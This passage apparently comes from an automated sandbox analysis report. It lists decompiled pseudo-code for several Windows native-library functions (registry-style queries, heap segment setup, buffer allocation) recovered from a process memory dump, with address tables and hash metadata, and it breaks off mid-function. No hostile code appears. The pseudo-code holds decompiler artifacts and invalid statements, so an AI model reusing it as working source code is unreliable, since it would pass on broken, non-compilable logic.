				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x16cd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E01600548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0161B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E015EB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x16c7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E015F7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E015F7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01657016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E01619830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E016569A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x16c7c04 != 0) {
						_t118 = _v12;
						_t120 = E0165A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x16c7bd8;
						if( *0x16c7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E016195D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push("true");
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E016199A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01653540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E015DB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0161AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x16c8474 - 3;
										if( *0x16c8474 != 3) {
											 *0x16c79dc =  *0x16c79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E015F7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E015F7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01657016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x16c8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x16c7b00; // 0x0
							asm("ror esi, cl");
							 *0x16cb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E016195D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E015E7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x016003f1
0x016003f7
0x016003f9
0x016003fb
0x016003fd
0x01600400
0x0160040a
0x01644c7a
0x01600537
0x01600547
0x01600410
0x01600410
0x01600414
0x01600417
0x0160041a
0x01600421
0x01600424
0x0160042b
0x0160043b
0x0160043e
0x0160043f
0x0160043f
0x01600446
0x01600449
0x0160044c
0x0160044f
0x01600459
0x01644c8d
0x0160045f
0x0160045f
0x0160045f
0x01600467
0x01644c97
0x01644c9d
0x01644ca4
0x01644caa
0x01644caf
0x01644cb1
0x01644cc3
0x01644cb3
0x01644cbc
0x01644cbc
0x01644cc8
0x01644ccb
0x01644cd7
0x01644cda
0x01644cdf
0x01644cdf
0x01644ccb
0x01644ca4
0x0160046d
0x0160046f
0x0160046f
0x01600471
0x01600476
0x0160047a
0x0160047b
0x01600483
0x01600489
0x0160048d
0x00000000
0x00000000
0x01644ce9
0x01644cef
0x01644d22
0x01644d22
0x00000000
0x01644d22
0x01644cf1
0x01644cf7
0x00000000
0x00000000
0x01644cf9
0x01644cff
0x00000000
0x00000000
0x01644d05
0x01644d07
0x00000000
0x00000000
0x01644d0d
0x01644d0f
0x01644d14
0x01644d16
0x00000000
0x00000000
0x01644d1c
0x01644d1c
0x01600499
0x01600535
0x01600535
0x00000000
0x01600535
0x016004a6
0x01644d2c
0x01644d37
0x01644d39
0x01644d3b
0x00000000
0x00000000
0x01644d41
0x01644d48
0x01600527
0x0160052b
0x0160052d
0x01600530
0x01600530
0x00000000
0x0160052b
0x01644d4e
0x016004ac
0x016004ac
0x016004af
0x016004b2
0x016004b7
0x016004b9
0x016004bb
0x016004bd
0x016004bf
0x016004c5
0x016004c9
0x01644d53
0x01644d59
0x01644db9
0x01644dba
0x01644dbf
0x01644dc2
0x01644dc4
0x01644dc7
0x01644dce
0x00000000
0x01644dce
0x01644d5b
0x01644d61
0x00000000
0x00000000
0x01644d63
0x01644d69
0x00000000
0x00000000
0x01644d6b
0x01644d6e
0x01644d74
0x01644d76
0x01644d7c
0x01644d7e
0x01644d84
0x01644d89
0x01644d8c
0x01644d8d
0x01644d92
0x01644d95
0x01644d96
0x01644d98
0x01644d9a
0x01644d9f
0x01644da4
0x01644da6
0x01644da8
0x01644daf
0x01644db1
0x01644db1
0x01644daf
0x01644da6
0x01644d84
0x01644d7c
0x00000000
0x01644d74
0x016004d6
0x01644de1
0x016004dc
0x016004dc
0x016004dc
0x016004e4
0x01644deb
0x01644df1
0x01644df8
0x01644dfe
0x01644e03
0x01644e05
0x01644e17
0x01644e07
0x01644e10
0x01644e10
0x01644e1c
0x01644e1f
0x01644e35
0x01644e35
0x01644e1f
0x01644df8
0x016004f1
0x016004fa
0x01644e3f
0x01644e47
0x01644e5b
0x01644e61
0x01644e67
0x01644e69
0x01644e71
0x01644e73
0x01600500
0x01600500
0x01600500
0x016004fa
0x01600508
0x0160051d
0x0160051d
0x0160051f
0x01600524
0x00000000
0x01600524
0x01600515
0x01600517
0x01644e7a
0x01644e7c
0x00000000
0x00000000
0x01644e85
0x00000000
0x01644e85
0x00000000
0x01600517

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29ea668ea1b762624027668a16c36fc6559697c47576f803f3a7af87084e6bad
Instruction ID: 9d9a171b634d6a868f2122222482ea53b19577f7d0ef8d7e6656f1fae3d17bad
Opcode Fuzzy Hash: 29ea668ea1b762624027668a16c36fc6559697c47576f803f3a7af87084e6bad
Instruction Fuzzy Hash: D6914432E00255AFEB379B6CCC45BBE7BA5AB05764F0A0265FA50AB3D1DB349D00C785

Uniqueness

Uniqueness Score: -1.00%

Function 015DC600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E015DC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x16cd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E015E6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0161B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x16c7b9c; // 0x0
					_t74 = L015F4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E01619650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L015F77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0161F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E016113C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L015F77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E01619650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x015dc608
0x015dc615
0x015dc625
0x015dc62d
0x015dc635
0x015dc640
0x015dc680
0x015dc687
0x015dc688
0x015dc689
0x015dc694
0x015dc694
0x015dc642
0x015dc64a
0x015dc697
0x01647a25
0x01647a2b
0x01647a2e
0x01647a30
0x01647bea
0x01647bea
0x00000000
0x01647bea
0x01647a36
0x01647a43
0x01647a48
0x01647a4c
0x01647a4e
0x00000000
0x00000000
0x01647a58
0x01647a5a
0x01647a5b
0x01647a5c
0x01647a5d
0x01647a63
0x01647a64
0x01647a6a
0x01647a6c
0x01647a6e
0x016479cb
0x016479cb
0x016479ce
0x016479d0
0x01647a98
0x01647a9b
0x01647a9b
0x01647a9e
0x01647aa1
0x01647bbe
0x01647bbe
0x01647bc0
0x01647be0
0x01647be0
0x01647a01
0x01647a01
0x01647a05
0x01647a07
0x01647a15
0x01647a15
0x01647a1a
0x00000000
0x01647a1a
0x01647bc2
0x01647bc6
0x01647bc9
0x01647bcd
0x01647bcf
0x016479e6
0x016479e6
0x016479eb
0x016479eb
0x016479ef
0x016479f1
0x00000000
0x00000000
0x016479f3
0x016479f5
0x016479ff
0x016479ff
0x00000000
0x016479ff
0x016479f7
0x016479fd
0x00000000
0x00000000
0x00000000
0x016479fd
0x01647bd5
0x01647bd8
0x00000000
0x00000000
0x01647ba9
0x01647bac
0x01647bb0
0x01647bb1
0x01647bb1
0x01647bb6
0x00000000
0x01647bb6
0x01647aa7
0x01647aaa
0x00000000
0x00000000
0x01647ab2
0x01647ab3
0x01647ab5
0x01647aec
0x01647aef
0x01647b25
0x01647b28
0x01647b62
0x01647b64
0x01647b8f
0x01647b92
0x01647b96
0x01647b98
0x00000000
0x00000000
0x01647b9e
0x01647b9f
0x01647ba3
0x00000000
0x01647ba3
0x01647b66
0x01647b68
0x01647ae2
0x01647ae2
0x00000000
0x01647ae2
0x01647b6e
0x01647b72
0x01647b75
0x01647b81
0x01647b85
0x01647b87
0x00000000
0x00000000
0x01647b31
0x01647b34
0x01647b3c
0x01647b45
0x01647b46
0x01647b4f
0x01647b51
0x01647b57
0x01647b59
0x01647b59
0x00000000
0x01647b59
0x01647b77
0x00000000
0x01647b77
0x01647b2a
0x00000000
0x01647b2a
0x01647af1
0x01647af3
0x00000000
0x00000000
0x01647afb
0x01647afc
0x01647afe
0x00000000
0x00000000
0x01647b00
0x01647b03
0x00000000
0x00000000
0x01647b05
0x01647b09
0x01647b0d
0x01647b0f
0x00000000
0x00000000
0x01647b18
0x01647b1d
0x00000000
0x01647b1d
0x01647ab7
0x01647ab9
0x00000000
0x00000000
0x01647abf
0x01647ac1
0x00000000
0x00000000
0x01647ac3
0x01647ac6
0x00000000
0x00000000
0x01647ac8
0x01647acc
0x01647ad0
0x01647ad2
0x00000000
0x00000000
0x01647adb
0x00000000
0x01647adb
0x016479d6
0x016479d9
0x016479dc
0x01647a91
0x01647a94
0x00000000
0x01647a94
0x016479e2
0x00000000
0x016479e2
0x01647a74
0x01647a7a
0x00000000
0x00000000
0x01647a8a
0x01647a21
0x01647a21
0x00000000
0x01647a21
0x015dc650
0x015dc651
0x015dc656
0x015dc65c
0x015dc65d
0x015dc663
0x015dc664
0x015dc66a
0x015dc66e
0x016479c5
0x016479c7
0x00000000
0x016479c7
0x015dc67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edb8315c761940c2e485c4a92796595a85b33e95f52a878d7b87fc12a5f5e7b7
Instruction ID: 13d5de0a2207a5d0a3cef7b09f1b88f08def193a73a4d29aebb101b8bf1029e5
Opcode Fuzzy Hash: edb8315c761940c2e485c4a92796595a85b33e95f52a878d7b87fc12a5f5e7b7
Instruction Fuzzy Hash: FA818C756442468BDB26CE58CC80A7AB7E9FF84354F18486EEE459B341D330ED85CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0160138B, Relevance: .2, Instructions: 206
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E0160138B(signed int __ecx, signed int* __edx, intOrPtr _a4, signed int _a12, signed int _a16, char _a20, intOrPtr _a24) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				signed int _t97;
				signed int _t102;
				void* _t105;
				char* _t112;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				signed int* _t122;
				signed int _t124;
				signed int _t130;
				signed int _t136;
				char _t150;
				intOrPtr _t153;
				signed int _t161;
				signed int _t163;
				signed int _t170;
				signed int _t175;
				signed int _t176;
				signed int _t182;
				signed int* _t183;
				signed int* _t184;

				_t182 = __ecx;
				_t153 = _a24;
				_t183 = __edx;
				_v24 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
				_t97 = _t153 - _a16;
				if(_t97 > 0xfffff000) {
					L19:
					return 0;
				}
				asm("cdq");
				_t150 = _a20;
				_v16 = _t97 / 0x1000;
				_t102 = _a4 + 0x00000007 & 0xfffffff8;
				_t170 = _t102 + __edx;
				_v20 = _t102 >> 0x00000003 & 0x0000ffff;
				_t105 = _t170 + 0x28;
				_v12 = _t170;
				if(_t105 >= _t150) {
					if(_t105 >= _t153) {
						goto L19;
					}
					_v8 = _t170 - _t150 + 8;
					_push(E01600678(__ecx, 1));
					_push(0x1000);
					_push( &_v8);
					_push(0);
					_push( &_a20);
					_push(0xffffffff);
					if(E01619660() < 0) {
						 *((intOrPtr*)(_t182 + 0x214)) =  *((intOrPtr*)(_t182 + 0x214)) + 1;
						goto L19;
					}
					if(E015F7D50() == 0) {
						_t112 = 0x7ffe0380;
					} else {
						_t112 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t112 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0169138A(_t150, _t182, _a20, _v8, 3);
					}
					_t150 = _a20 + _v8;
					_t153 = _a24;
					_a20 = _t150;
				}
				_t183[0] = 1;
				_t113 = _t153 - _t150;
				_t183[1] = 1;
				asm("cdq");
				_t175 = _t113 % 0x1000;
				_v28 = _t113 / 0x1000;
				 *_t183 = _v20;
				_t183[1] =  *(_t182 + 0x54);
				if((_v24 & 0x00001000) != 0) {
					_t117 = E016016C7(1, _t175);
					_t150 = _a20;
					_t183[0xd] = _t117;
				}
				_t183[0xb] = _t183[0xb] & 0x00000000;
				_t176 = _v12;
				_t183[3] = _a12;
				_t119 = _a16;
				_t183[7] = _t119;
				_t161 = _v16 << 0xc;
				_t183[6] = _t182;
				_t183[0xa] = _t119 + _t161;
				_t183[8] = _v16;
				_t122 =  &(_t183[0xe]);
				_t183[2] = 0xffeeffee;
				_t183[9] = _t176;
				 *((intOrPtr*)(_t182 + 0x1e8)) =  *((intOrPtr*)(_t182 + 0x1e8)) + _t161;
				 *((intOrPtr*)(_t182 + 0x1e4)) =  *((intOrPtr*)(_t182 + 0x1e4)) + _t161;
				_t122[1] = _t122;
				 *_t122 = _t122;
				if(_t183[6] != _t183) {
					_t124 = 1;
				} else {
					_t124 = 0;
				}
				_t183[1] = _t124;
				 *(_t176 + 4) =  *_t183 ^  *(_t182 + 0x54);
				if(_t183[6] != _t183) {
					_t130 = (_t176 - _t183 >> 0x10) + 1;
					_v24 = _t130;
					if(_t130 >= 0xfe) {
						_push(_t161);
						_push(0);
						E0169A80D(_t183[6], 3, _t176, _t183);
						_t150 = _a20;
						_t176 = _v12;
						_t130 = _v24;
					}
				} else {
					_t130 = 0;
				}
				 *(_t176 + 6) = _t130;
				E015FB73D(_t182, _t183, _t150 - 0x18, _v28 << 0xc, _t176,  &_v8);
				if( *((intOrPtr*)(_t182 + 0x4c)) != 0) {
					_t183[0] = _t183[0] ^  *_t183 ^ _t183[0];
					 *_t183 =  *_t183 ^  *(_t182 + 0x50);
				}
				if(_v8 != 0) {
					E015FA830(_t182, _v12, _v8);
				}
				_t136 = _t182 + 0xa4;
				_t184 =  &(_t183[4]);
				_t163 =  *(_t136 + 4);
				if( *_t163 != _t136) {
					_push(_t163);
					_push( *_t163);
					E0169A80D(0, 0xd, _t136, 0);
				} else {
					 *_t184 = _t136;
					_t184[1] = _t163;
					 *_t163 = _t184;
					 *(_t136 + 4) = _t184;
				}
				 *((intOrPtr*)(_t182 + 0x1f4)) =  *((intOrPtr*)(_t182 + 0x1f4)) + 1;
				return 1;
			}

0x0160139f
0x016013a1
0x016013a4
0x016013a6
0x016013ab
0x016013b3
0x01645522
0x00000000
0x01645522
0x016013b9
0x016013c1
0x016013c4
0x016013cd
0x016013d0
0x016013d9
0x016013dc
0x016013df
0x016013e4
0x0164552b
0x00000000
0x00000000
0x01645534
0x0164553f
0x01645545
0x01645549
0x0164554a
0x0164554f
0x01645550
0x01645559
0x0164551c
0x00000000
0x0164551c
0x01645562
0x01645574
0x01645564
0x0164556d
0x0164556d
0x0164557c
0x01645597
0x01645597
0x0164559f
0x016455a2
0x016455a5
0x016455a5
0x016013ec
0x016013f2
0x016013f4
0x016013f8
0x016013fe
0x01601400
0x01601406
0x01601412
0x01601419
0x016455b0
0x016455b5
0x016455b8
0x016455b8
0x01601425
0x01601429
0x0160142c
0x0160142f
0x01601432
0x01601435
0x0160143a
0x0160143d
0x01601443
0x01601446
0x01601449
0x01601450
0x01601453
0x01601459
0x0160145f
0x01601462
0x01601467
0x016014fa
0x0160146d
0x0160146d
0x0160146d
0x0160146f
0x01601479
0x01601480
0x01601507
0x01601508
0x01601510
0x016455c1
0x016455c2
0x016455cc
0x016455d1
0x016455d4
0x016455d7
0x016455d7
0x01601482
0x01601482
0x01601482
0x01601484
0x0160149b
0x016014a4
0x016014ae
0x016014b4
0x016014b4
0x016014ba
0x016014c4
0x016014c4
0x016014c9
0x016014cf
0x016014d2
0x016014d7
0x016455df
0x016455e0
0x016455ea
0x016014dd
0x016014dd
0x016014df
0x016014e2
0x016014e4
0x016014e4
0x016014e7
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
Instruction ID: 8031e1ecd31a207ca234085342255e841b4c10f319ae4bc8d6d08b8f88ba7c7f
Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
Instruction Fuzzy Hash: 9A817A75A016469FCB29CF68C840AAABBF5FF49300F14856EE956C7791D330EA41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0166B8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0166B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x16c7b9c; // 0x0
				_t124 = L015F4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E01619800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E016195B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E016195D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L015F77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E01619910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E016195D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
